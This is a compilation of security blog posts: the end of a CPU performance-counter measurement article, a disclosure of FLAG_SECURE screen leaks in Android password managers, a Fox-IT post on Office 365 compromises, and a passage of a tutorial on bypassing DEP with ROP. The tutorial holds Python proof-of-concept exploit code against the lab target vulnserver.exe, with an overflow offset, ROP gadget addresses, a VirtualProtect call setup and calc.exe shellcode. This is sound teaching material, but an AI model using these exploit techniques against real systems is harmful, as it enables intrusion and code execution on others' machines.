    enable_perf_counter(perf_counter);

    // Go through each number of samples we want to collect for this performance
    // counter... for each cycle offset.
    for _ in 0..NUM_SAMPLES {
        // Go through each cycle we want to observe
        for cycle_offset in 1..=MAX_CYCLES {
            // Clear out the performance counter values: IA32_PMCx fields
            clear_perf_counters();

            // Program fixed counter #1 (un-halted cycle counter) to trigger
            // an interrupt on overflow. This will cause an interrupt, which
            // will then cause a freeze of all PMCs.
            program_fixed1_interrupt_on_overflow();

            // Program the fixed counter #1 (un-halted cycle counter) to
            // `cycles` prior to overflowing
            set_fixed1_value((1 << 48) - cycle_offset);

            // Do some pre-test environment setup. This is important to make
            // sure we can sample the code under test multiple times and get
            // the same result. Here is where you'd be flushing cache lines,
            // maybe doing a `wbinvd`, etc.
            set_up_environment();

            // Enable both the fixed #1 cycle counter and the PMC0 performance
            // counter (tracking the stat we're interested in) at the same time,
            // by using IA32_PERF_GLOBAL_CTRL. This is serializing so you don't
            // have to worry about re-ordering across this boundary.
            enable_perf_globally();

            asm!(r#"

                asm
                under
                test
                here

            "# :::: "volatile");

            // Clear IA32_PERF_GLOBAL_CTRL to 0 to stop counters
            disable_perf_globally();

            // If fixed PMC #1 has not overflowed, then we didn't capture
            // relevant data. This only can happen if we tried to sample a
            // cycle which happens after the assembly under test executed.
            if fixed1_pmc_overflowed() == false {
                continue;
            }

            // At this point we can do whatever we want as the performance
            // counters have been turned off by the interrupt and we should have
            // relevant data in both :)

            // Get the count from fixed #1 PMC. It's important that we grab this
            // as interrupts are not deterministic, and thus it's possible we
            // "overshoot" the target
            let fixed1_count = read_fixed1_counter();

            // Add the distance-from-overflow we initially programmed into the
            // fixed #1 counter, with the current value of the fixed #1 counter
            // to get the total number of cycles which have elapsed during
            // our example.
            let total_cycles = cycle_offset + fixed1_count;

            // Read the actual count from the performance counter we were using.
            // In this case we were using PMC #0 to track our event of interest.
            let value = read_pmc0();

            // Somehow log that performance counter `perf_counter` had a value
            // `value` `total_cycles` into execution
            log_result(perf_counter, value, total_cycles);
        }
    }
}

Simple results

So? Does it work? Let’s try with a simple example of code that just does a few “nops” by adjusting the stack a few times:

add rsp, 8
sub rsp, 8
add rsp, 8
sub rsp, 8

Simple Sample

So how do we read this graph? Well, the x-axis is simple. It’s the time, in cycles, of execution. The y-axis is the number of events (which varies based on the key). In this case we’re only graphing the number of instructions retired (successfully executed).

So does this look right? Hmmm…. we ran 4 instructions, why did we see 8 retire?

Well in this case there’s a little bit of “extra” noise introduced by the harnessing around the code under test. Let’s zoom out from our code and look at what actually executes during our test:

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f ; IA32_PERF_GLOBAL_CTRL
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

; Here's our code under test :D
00000011  4883C408          add rsp,byte +0x8
00000015  4883EC08          sub rsp,byte +0x8
00000019  4883C408          add rsp,byte +0x8
0000001D  4883EC08          sub rsp,byte +0x8

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000021  B98F030000        mov ecx,0x38f
00000026  31C0              xor eax,eax
00000028  31D2              xor edx,edx
0000002A  0F30              wrmsr

So if we take another look at the graph, we see there are 8 instructions that retired. The very first instruction we see retire (at cycle=11), is actually the wrmsr we used to enable the counters. This makes sense, at some point prior to retirement of the wrmsr instruction the counters must be enabled internally somewhere in the CPU. So we actually get to see this instruction retire!

Then we see 7 more instructions retire to give us a total of 8… hmm. Well, we have 4 of our add and sub mix that we executed, so that brings us down to 3 more remaining “unknown” instructions.

These 3 remaining instructions are explained by the code which disables the performance counter after our test code has executed. We have 1 mov, and 2 xor instructions which retire prior to the wrmsr which disables the counters. It makes sense that we never see the final wrmsr retire as the counters will be turned off in the CPU prior to the wrmsr instruction retiring!

Wala! It all makes sense. We now have a great view into what the CPU did in terms of retirement for this code in question. Everything we saw lined up with what actually executed, always good to see.

A bit more advanced result

Lets add a few more performance counters to track. In this case lets track the number of instructions retired, as well as the number of micro-ops dispatched to port 4 (the store port). This will give us the number of stores which occurred during test.

Code to test (just a few writes to the stack):

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

00000011  4883EC08          sub rsp,byte +0x8
00000015  48C7042400000000  mov qword [rsp],0x0
0000001D  4883C408          add rsp,byte +0x8
00000021  4883EC08          sub rsp,byte +0x8
00000025  48C7042400000000  mov qword [rsp],0x0
0000002D  4883C408          add rsp,byte +0x8

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000031  B98F030000        mov ecx,0x38f
00000036  31C0              xor eax,eax
00000038  31D2              xor edx,edx
0000003A  0F30              wrmsr

Store Sample

This one is fun. We simply make room on the stack (sub rsp), write a 0 to the stack (mov [rsp]), and then restore the stack (add rsp), and then do it all again one more time.

Here we added another plot to the graph, Port 4, which is the store uOP port on the CPU. We also track the number of instructions retired, as we did in the first example. Here we can see instructions retired matches what we would expect. We see 10 retirements, 1 from the first wrmsr enabling the performance counters, 6 from our own code under test, and 3 more from the disabling of the performance counters.

This time we’re able to see where the stores occur, and indeed, 2 stores do occur. We see a store happen at cycle=28 and cycle=29. Interestingly we see the stores are back-to-back, even though there’s a bit of code between them. We’re probably observing some re-ordering! Later in the graph (cycle=39), we observe that 4 instructions get retired in a single cycle! How cool is that?!

How deep can we go?

Using the exact same store example from above, we can enable even more performance counters. This gives us an even more detailed view of different parts of the micro-architectural state.

Busy Sample

In this case we’re tracking all uOP port activity, machine clears (when the CPU resets itself after speculation), offcore requests (when messages get sent offcore, typically to access physical memory), instructions retired, and branches retired. In theory we can measure any possible performance counter available on our micro-architecture on a time domain. This gives us the ability to see almost anything that is happening on the CPU!

Noise…

In all of the examples we’ve looked at, none of the data points have visible error bars. In these graphs the error bars represent the minimum value, mean value, and maximum value observed for a given data point. Since we’re running the same code over and over, and sampling it at different execution times, it’s very possible for “random” noise to interfere with results. Let’s look at a bit more noisy example:

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

00000011  48C7042500000000  mov qword [0x0],0x0
         -00000000
0000001D  48C7042500000000  mov qword [0x0],0x0
         -00000000
00000029  48C7042500000000  mov qword [0x0],0x0
         -00000000
00000035  48C7042500000000  mov qword [0x0],0x0
         -00000000

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000041  B98F030000        mov ecx,0x38f
00000046  31C0              xor eax,eax
00000048  31D2              xor edx,edx
0000004A  0F30              wrmsr

Here we’re just going to write to NULL 4 times. This might sound bad, but in this example I mapped NULL in as normal write-back memory. Nothing crazy, just treat it as a valid address.

But here are the results:

Noise Sample

Hmmm… we have error bars! We see the stores always get dispatched at the same time. This makes sense, we’re always doing the same thing. But we see that some of the instructions have some variance in where they retire. For example, at cycle=38 we see that sometimes at this point 2 instructions have been retired, other times 4 have been retired, but on average a little over 3 instructions have been retired at this point. This tells us that the CPU isn’t always deterministic in this environment.

These results can get a bit more complex to interpret, but it’s still relevant data nevertheless. Changing the code under test, cleaning up to the environment to be more determinsitic, etc, can often improve the quality and visibility of the data.

Does it work with speculation?

Damn right it does! That was the whole point!

Let’s cause a fault, perform some loads behind it, and see if we can see the loads get issued even though the entire section of code is discarded.

    // Start a TSX section, think of this as a `try {` block
    xbegin 2f

    // Read from -1, causing a fault
    mov rax, [-1]

    // Here's some loads shadowing the faulting load. These
    // should never occur, as the instruction above causes
    // an exeception and thus execution should "jump" to the label `2:`

    .rept 32
        // Repeated load 32 times
        mov rbx, [0]
    .endr

    // End the TSX section, think of this as a `}` closing the
    // `try` block
    xend

2:
    // Here is where execution goes if the TSX section had
    // an exception, and thus where execution will flow

Speculation Sample

Both ports 2 and port 3 are load ports. We see both of them taking turns handling loads (1 load per cycle each, with 2 ports, 2 loads per cycle total). Here we can see many different loads get dispatched, even though very few instructions actually retire. What we’re viewing here is the micro-architecture performing speculation! Neat!

More data?

I could go on and on graphing different CPU behaviors! There’s so much cool stuff to explore out there. However, this blog has already gotten longer than I wanted, so I’ll stop here. Maybe I’ll make future small blogs about certain interesting behaviors!


Conclusion

This technique of measuring performance counters on a time-domain seems to work quite well. You have to be very careful with noise, but with careful interpretation of the data, this technique provides the highest level of visibility into the Intel micro-architecture that I’ve ever seen!

This tool is incredibly useful for validating hypothesises about behaviors of various Intel micro-architectures. By running multiple experiments on different behaviors, a more macro-level model can be derived about the inner workings of the CPU. This could lead to learning new optimization techniques, finding new CPU vulnerabilities, and just in general having fun learning how things work!


Source?

Update: 8/19/2019

This kernel has too many sensitive features that I do not want to make public at this time…

However, it seems there’s a lot of interest in this tech, so I will try to live stream soon adding this functionality to my already-open-source kernel Orange Slice!


One Bug To Rule Them All: Modern Android Password Managers and FLAG_SECURE Misuse

21 August 2019 at 22:00

A few months ago I stumbled upon a 2016 blog post by Mark Murphy, warning about the state of FLAG_SECURE window leaks in Android. This class of vulnerabilities has been around for a while, hence I wasn’t confident that I could still leverage the same weakness in modern Android applications. As it often turns out, I was being too optimistic. After a brief survey, I discovered that the issue still persists today in many password manager applications (and others).

The problem

The FLAG_SECURE setting was initially introduced as an additional setting to WindowManager.LayoutParams to prevent DRM-protected content from appearing in screenshots, video screencaps or from being viewed on “non-secure displays”.

This last term was created to distinguish between virtual screens created by the MediaProjection API (a native API to capture screen contents) and physical display devices like TV screens (having a DRM-secure video output). In this way Google forestalled the piracy apps issue by preventing unsigned apps from creating virtual “secure” displays, only allowing casting to physical “secure” devices.
While FLAG_SECURE nowadays serves its original purpose well (to the delight of e.g. Netflix, Google Play Movies, Youtube Red), developers during the years mistook this “secure” flag as an easy catch-all security feature provided by Android to mark the entire app from being excepted from a screen capture or recording.

Unfortunately, this functionality is not global for the entire app, but can only be set on specific screens that contain sensitive data. To make matters worse, every Android fragment used in the application will not respect the FLAG_SECURE set for the activity and won’t pass down the flag to any other Window instances created on behalf of that activity. As a consequence of this, several native UI components like Spinner,Toast,Dialog,PopupWindow and many others will still leak their content to third party applications having the right permissions.

The approach

After a short survey, I decided to investigate a category of apps in which a content leak would have had the biggest impact: mobile password managers. This would also be the category of applications a generic attacker would probably choose to target first, along with banking apps.
With this in mind, I fired up a screen capture application (mnml) and started poking around. After a few days of testing, every Android password manager examined (4) was found to be vulnerable to some extent.

The following sections provide a summary of the discovered issues. All vulnerabilities were disclosed to the vendors throughout the second week of May 2019.

1Password

In 1Password, the Account Settings’ section offers a way to manage 1Password accounts. One of the functionalities is “Large Type”, which allows showing an account’s Secret Key in a large, easy-to-read format. The fragment showing the Secret Key leaks the generated password to third-party applications installed on the victim’s device. The Secret Key is combined with the user’s Master Password to create the full encryption key used to encrypt the accounts data, protecting them on the server side.

1Password Secret Key Leak Vulnerability

This was fixed in 1Password for Android in version 7.1.5, which was released on May 29, 2019.

Keeper

When a user taps the password field, Keeper shows a “Copied to Clipboard” toast. But if the user shows the cleartext password with the “Eye” icon, the toast will also contain the secret cleartext password. This fragment showing the copied password leaks the password to third-party applications.

Keeper Password Leak Vulnerability (without FLAG_SECURE set) Keeper Password Leak Vulnerability (with FLAG_SECURE set)

This was fixed in Keeper for Android version 14.3.0, which was released on June 21, 2019. An official advisory was also issued.

Dashlane

Dashlane features a random password generation functionality, usable when an account entry is inserted or edited. Unfortunately, the window responsible for choosing the parameter for the “safe” passwords is visible by third parties applications on the victim’s device.

Dashlane Password Leak Vulnerability

Note that it is also possible for an attacker to infer the service associated with the leaked password, since the services list and autocomplete fragment is also missing the FLAG_SECURE flag, resulting in its leak.

Dashlane Leak Vulnerability Dashlane Leak Vulnerability

The issue was fixed in Dashlane for Android in version 6.1929.2.

The attack scenario

Several scenarios would result in an app being installed on a user’s phone recording their activity. These include:

  • Malicious casting apps requiring record permission, since users usually don’t know that casting apps can also record their screen;
  • Innocuous-looking apps using Cloak & Dagger attacks;
  • Malicious app installed through third-party Android app stores or bypassing PHA detection filters of the Play Store;
  • Malicious app pushed to the smartphone using the Play Store feature in a Man-in-the-Browser attack scenario;

If these scenarios seem unlikely to happen in real life, it is worth noting that there have been several instances of apps abusing this class of attacks in the recent past.

Many thanks to the 1Password, Keeper, and Dashlane security teams that handled the report in a professional way, issued a payout, and allowed the disclosure. Please remember that using a password manager is still the best choice these days to protect your digital accounts and that all the above issues are now fixed.

As always, this research was possible thanks to my 25% research time at Doyensec!

Office 365: prone to security breaches?

By: Fox IT
11 September 2019 at 11:30

Author: Willem Zeeman

“Office 365 again?”. At the Forensics and Incident Response department of Fox-IT, this is heard often.  Office 365 breach investigations are common at our department.
You’ll find that this blog post actually doesn’t make a case for Office 365 being inherently insecure – rather, it discusses some of the predictability of Office 365 that adversaries might use and mistakes that organisations make. The final part of this blog describes a quick check for signs if you already are a victim of an Office 365 compromise. Extended details about securing and investigating your Office 365 environment will be covered in blogs to come.

Office 365 is predictable
A lot of adversaries seem to have a financial motivation for trying to breach an email environment. A typical adversary doesn’t want to waste too much time searching for the right way to access the email system, despite the fact that it is often enough to browse to an address like https://webmail.companyname.tld. But why would the adversary risk encountering a custom or extra-secure web page? Why would the adversary accept the uncertainty of having to deal with a certain email protocol in use by the particular organisation? Why guess the URL? It’s much easier to use the “Cloud approach”.

In this approach, an adversary first collects a list of valid credentials (email address and password), most frequently gathered with the help of a successful phishing campaign. When credentials have been captured, the adversary simply browses to https://office.com and tries them. If there’s no second type of authentication required, they are in. That’s it. The adversary is now in paradise, because after gaining access, they also know what to expect here. Not some fancy or out-dated email system, but an Office 365 environment just like all the others. There’s a good chance that the compromised account owns an Exchange Online mailbox too.

In predictable environments, like Office 365, it’s also much easier to automate your process of evil intentions. The adversary may create a script or use some tooling, complement it with the gathered list of credentials and sit back. Of course, an adversary may also target a specific on-premises system configuration, but seen from an opportunistic point of view, why would they? According to Microsoft, more than 180 million people are using their popular cloud-based solution. It’s far more effective to try another set of credentials and enter another predictable environment than it is to spend time in figuring out where information might be available, and how the environment is configured.

Office 365 is… secure?
Well, yes, Office 365 is a secure platform. The truth is that it has a lot more easy-to-deploy security capabilities than the most common on-premises solutions. The issue here is that organisations seem to not always realise what they could and should do to secure Office 365.

Best practices for securing your Office 365 environment will be covered in a later blog, but here’s a sneak preview: More than 90% of the Office 365 breaches investigated by Fox-IT would not have happened if the organisation would have had multi-factor authentication in place. No, implementation doesn’t need to be a hassle. Yes, it’s a free to use option. Other security measures like receiving automatic alerts on suspicious activity detected by built-in Office 365 processes are free as well, but often neglected.

Simple preventive solutions like these are not even commonly available in on-premises-situation environments. It almost seems that many companies assume that they can get perfect security right out of the box, rather than configuring the platform to their needs. This may be the reason for organisations to do not even bother configuring Office 365 in a more secure way. That’s a pity, especially when securing your environment is often just a few cloud-clicks away. Office 365 may not be less secure than an on-premises solution, but it might be more prone to being compromised though. Thanks to the lack of involved expertise, and thanks to adversaries who know how to take advantage of this. Microsoft already offers multi-factor authentication to reduce the impact of attacks like phishing. This is great news, because we know from experience that most of the compromises that we see could have been prevented if those companies had used MFA. However, compelling more organisations to adopt it remains an ongoing challenge, and how to drive increased adoption of MFA remains an open question.

A lot of organisations are already compromised. Are you?
At our department we often see that it may take months(!) for an organisation to realise that they have been compromised. In Office 365 breaches, the adversary is often detected due to an action that causes so much noise that it’s no longer possible for the adversary to hide. When the adversary thinks it’s no longer beneficial to persist, the next step is to try to get foothold into another organisation. In our investigations, we see that when this happens, the adversary has already tried reaching a financial goal. This financial goal is often achieved by successfully committing a payment related fraud in which they use an employee’s internal email account to mislead someone. Eventually, to advance into another organisation, a phishing email is sent by the adversary to a large part of the organisation’s address list. In the end, somebody will likely take the bait and leave their credentials on a malevolent and adversary-controlled website. If a victim does, the story starts over again, at the other organisation. For the adversary, it’s just a matter of repeating the steps.

The step to gain foothold in another organisation is also the moment that a lot of (phishing) email messages are flowing out of the organisation. Thanks to Office 365 intelligence, these are automatically blocked if the number of messages surpasses a given limit based on the user’s normal email behaviour. This is commonly the moment where the victim gets in touch with their system administrator, asking why they can’t send any email anymore. Ideally, the system administrator will quickly notice the email messages containing malicious content and report the incident to the security team.

For now, let’s assume you do not have the basic precautions set up, and you want to know if somebody is lurking in your Office 365 environment. You could hire experts to forensically scrutinize your environment, and that would be a correct answer. There actually is a relatively easy way to check if Microsoft’s security intelligence already detected some bad stuff. In this blog we will zoom in on one of these methods. Please keep in mind that a full discussion of these range of the available methods is beyond the scope of this blog post. This blog post describes the method that from our perspective gives quick insights in (afterwards) checking for signs of a breach. The not-so-obvious part of this step is that you will find the output in Microsoft Azure, rather than in Office 365. A big part of the Office 365 environment is actually based on Microsoft Azure, and so is its authentication. This is why it’s usually[1] possible to log in at the Azure portal and check for Risk events.

The steps:

  1. Go to https://portal.azure.com and sign-in with your Office 365 admin account[2]
  2. At the left pane, click Azure Active Directory
  3. Scroll down to the part that says Security and click Risk events
  4. If there are any risky events, these will be listed here. For example, impossible travels are one of the more interesting events to pay attention to. These may look like this:

This risk event type identifies two sign-ins from the same account, originating from geographically distant locations within a period in which the geographically distance cannot be covered. Other unusual sign-ins are also marked by machine learning algorithms. Impossible travel is usually a good indicator that an adversary was able to successfully sign in. However, false positives may occur when a user is traveling using a new device or using a VPN.

Apart from the impossible travel registrations, Azure also has a lot of other automated checks which might be listed in the Risk events section. If you have any doubts about these, or if a compromise seems likely: please get in contact with your security team as fast as possible. If your security team needs help in the investigation or mitigation, contact the FoxCERT team. FoxCERT is available 24/7 by phone on +31 (0)800 FOXCERT (+31 (0)800-3692378).

[1] Disregarding more complex federated setups, and assuming the licensing model permits.

[2] The risky sign-ins reports are available to users in the following roles: Security Administrator, Global Administrator, Security Reader. Source: https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/concept-risky-sign-ins

marketingfoxit

Exploit Development: Hands Up! Give Us the Stack! This Is a ROPpery!

21 September 2019 at 00:00

Introduction

Over the years, the security community as a whole realized that there needed to be a way to stop exploit developers from easily executing malicious shellcode. Microsoft, over time, has implemented a plethora of intense exploit mitigations, such as: EMET (the Enhanced Mitigation Experience Toolkit), CFG (Control Flow Guard), Windows Defender Exploit Guard, and ASLR (Address Space Layout Randomization).

DEP, or Data Execution Prevention, is another one of those roadblocks that hinders exploit developers. This blog post will only be focusing on defeating DEP, within a stack-based data structure on Windows.

A Brief Word About DEP

Windows XP SP2 32-bit was the first Windows operating system to ship DEP. Every version of Windows since then has included DEP. DEP, at a high level, gives memory two independent permission levels. They are:

  • The ability to write to memory.

    OR

  • The ability to execute memory.

But not both.

What this means, is that someone cannot write AND execute memory at the same time. This means a few things for exploit developers. Let’s say you have a simple vanilla stack instruction pointer overwrite. Let’s also say the first byte, and all of the following bytes of your payload, are pointed to by the stack pointer. Normally, a simple jmp stack pointer instruction would suffice- and it would rain shells. With DEP, it is not that simple. Since that shellcode is user introduced shellcode- you will be able to write to the stack. BUT, as soon as any execution of that user supplied shellcode is attempted- an access violation will occur, and the application will terminate.

DEP manifests itself in four different policy settings. From the MSDN documentation on DEP, here are the four policy settings:

Knowing the applicable information on how DEP is implemented, figuring how to defeat DEP is the next viable step.

Windows API, We Meet Again

In my last post, I explained and outlined how powerful the Windows API is. Microsoft has released all of the documentation on the Windows API, which aids in reverse engineering the parameters needed for API function calls.

Defeating DEP is no different. There are many API functions that can be used to defeat DEP. A few of them include:

The only limitation to defeating DEP, is the number of applicable APIs in Windows that change the permissions of the memory containing shellcode.

For this post, VirtualProtect() will be the Windows API function used for bypassing DEP.

VirtualProtect() takes the following parameters:

BOOL VirtualProtect(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flNewProtect,
  PDWORD lpflOldProtect
);

lpAddress = A pointer an address that describes the starting page of the region of pages whose access protection attributes are to be changed.

dwSize = The size of the region whose access protection attributes are to be changed, in bytes.

flNewProtect = The memory protection option. This parameter can be one of the memory protection constants. (0x40 sets the permissions of the memory page to read, write, and execute.)

lpflOldProtect = A pointer to a variable that receives the previous access protection value of the first page in the specified region of pages. (This should be any address that already has write permissions.)

Now this is all great and fine, but there is a question one should be asking themselves. If it is not possible to write the parameters to the stack and also execute them, how will the function get ran?

Let’s ROP!

This is where Return Oriented Programming comes in. Even when DEP is enabled, it is still possible to perform operations on the stack such as push, pop, add, sub, etc.

“How is that so? I thought it was not possible to write and execute on the stack?” This is a question you also may be having. The way ROP works, is by utilizing pointers to instructions that already exist within an application.

Let’s say there’s an application called vulnserver.exe. Let’s say there is a memory address of 0xDEADBEEF that when viewed, contains the instruction add esp, 0x100. If this memory address got loaded into the instruction pointer, it would execute the command it points to. But nothing user supplied was written to the stack.

What this means for exploit developers, is this. If one is able to chain a set of memory addresses together, that all point to useful instructions already existing in an application/system- it might be possible to change the permissions of the memory pages containing malicious shellcode. Let’s get into how this looks from a practicality/hands-on approach.

If you would like to follow along, I will be developing this exploit on a 32-bit Windows 7 virtual machine with ASLR disabled. The application I will be utilizing is vulnserver.exe.

A Brief Introduction to ROP Gadgets and ROP Chains

The reason why ROP is called Return Oriented Programming, is because each instruction is always followed by a ret instruction. Each ASM + ret instruction is known as a ROP gadget. Whenever these gadgets are loaded consecutively one after the other, this is known as a ROP chain.

The ret is probably the most important part of the chain. The reason the return instruction is needed is simple. Let’s say you own the stack. Let’s say you are able to load your whole ROP chain onto the stack. How would you execute it?

Enter ret. A return instruction simply takes whatever is located in the stack pointer (on top of the stack) and loads it into the instruction pointer (what is currently being executed). Since the ROP chain is located on the stack and a ROP chain is simply a bunch of memory addresses, the ret instruction will simply return to the stack, pick up the next memory address (ROP gadget), and execute it. This will keep happening, until there are no more left! This makes life a bit easier.

POC

Enough jibber jabber- here is the POC for vulnserver.exe:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+filler)
s.close()

..But …But What About Jumping to ESP?

There will not be a jmp esp instruction here. Remember, with DEP- this will kill the exploit. Instead, you’ll need to find any memory address that contains a ret instruction. As outlined above, this will directly take us back to the stack. This is normally called a stack pivot.

Where Art Thou ROP Gadgets?

The tool that will be used to find ROP gadgets is rp++. Some other options are to use mona.py or to search manually. To search manually, all one would need to do is locate all instances of ret and look at the above instructions to see if there is anything useful. Mona will also construct a ROP chain for you that can be used to defeat DEP. This is not the point of this post. The point of this post is that we are going to manually ROP the vulnserver.exe program. Only by manually doing something first, are you able to learn.

Let’s first find all of the dependencies that make up vulnserver.exe, so we can map more ROP chains beyond what is contained in the executable. Execute the following mona.py command in Immunity Debugger:

!mona modules:

Next, use rp++ to enumerate all useful ROP gadgets for all of the dependencies. Here is an example for vulnserver.exe. Run rp++ for each dependency:

The -f options specifies the file. The -r option specifies maximum number of instructions the ROP gadgets can contain (5 in our case).

After this, the POC needs to be updated. The update is going to reserve a place on the stack for the API call to the function VirtualProtect(). I found the address of VirtualProtect() to be at address 0x77e22e15. Remember, in this test environment- ASLR is disabled.

To find the address of VirtualProtect() on your machine, open Immunity and double-click on any instruction in the disassembly window and enter

call kernel32.VirtualProtect:

After this, double click on the same instruction again, to see the address of where the call is happening, which is kernel32.VirtualProtect in this case. Here, you can see the address I referenced earlier:

Also, you need to find a flOldProtect address. You can literally place any address in this parameter, that contains writeable permissions.

Now the POC can be updated:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between future ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+shellcode+filler)
s.close()

Before moving on, you may have noticed an arbitrary parameter variable for a parameter called return address added into the POC. This is not a part of the official parameters for VirtualProtect(). The reason this address is there (and right under the VirtualProtect() function) is because whenever the call to the function occurs, there needs to be a way to execute our shellcode. The address of return is going to contain the address of the shellcode- so the application will jump straight to the user supplied shellcode after VirtualProtect() runs. The location of the shellcode will be marked as read, write, and execute.

One last thing. The reason we are adding the shellcode now, is because of one of the properties of DEP. The shellcode will not be executed until we change the permissions of DEP. It is written in advance because DEP will allow us to write to the stack, so long as we are not executing.

Set a breakpoint at the address 0x62501022 and execute the updated POC. Step through the breakpoint with F7 in Immunity and take a look at the state of the stack:

Recall that the Windows API, when called, takes the items on the top of the stack (the stack pointer) as the parameters. That is why the items in the POC under the VirtualProtect() call are seen in the function call (because after EIP all of the supplied data is on the stack).

As you can see, all of the parameters are there. Here, at a high level, is we are going to change these parameters.

It is pretty much guaranteed that there is no way we will find five ROP gadgets that EXACTLY equal the values we need. Knowing this, we have to be more creative with our ROP gadgets and how we go about manipulating the stack to do what we need- which is change what values the current placeholders contain.

Instead what we will do, is put the calculated values needed to call VirtualProtect() into a register. Then, we will change the memory addresses of the placeholders we currently have, to point to our calculated values. An example would be, we could get the value for lpAddress into a register. Then, using ROP, we could make the current placeholder for lpAddress point to that register, where the intended value (real value) of lpAddress is.

Again, this is all very high level. Let’s get into some of the more low-level details.

Hey, Stack Pointer- Stay Right There. BRB.

The first thing we need to do is save our current stack pointer. Taking a look at the current state of the registers, that seems to be 0x018DF9E4:

As you will see later on- it is always best to try to save the stack pointer in multiple registers (if possible). The reason for this is simple. The current stack pointer is going to contain an address that is near and around a couple of things: the VirtualProtect() function call and the parameters, as well as our shellcode.

When it comes to exploitation, you never know what the state of the registers could be when you gain control of an application. Placing the current stack pointer into some of the registers allows us to easily be able to make calculations on different things on and around the stack area. If EAX, for example, has a value of 0x00000001 at the time of the crash, but you need a value of 0x12345678 in EAX- it is going to be VERY hard to keep adding to EAX to get the intended value. But if the stack pointer is equal to 0x12345670 at the time of the crash, it is much easier to make calculations, if that value is in EAX to begin with.

Time to break out all of the ROP gadgets we found earlier. It seems as though there are two great options for saving the state of the current stack pointer:

0x77bf58d2: push esp ; pop ecx ; ret  ;  RPCRT4.dll

0x77e4a5e6: mov eax, ecx ; ret  ;  user32.dll

The first ROP gadget will push the value of the stack pointer onto the stack. It will then pop it into ECX- meaning ECX now contains the value of the current stack pointer. The second ROP gadget will move the value of ECX into EAX. At this point, ECX and EAX both contain the current ESP value.

These ROP gadgets will be placed ABOVE the current parameters. The reason is, that these are vital in our calculation process. We are essentially priming the registers before we begin trying to get our intended values into the parameter placeholders. It makes it easier to do this before the VirtualProtect() call is made.

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+shellcode+filler)
s.close()

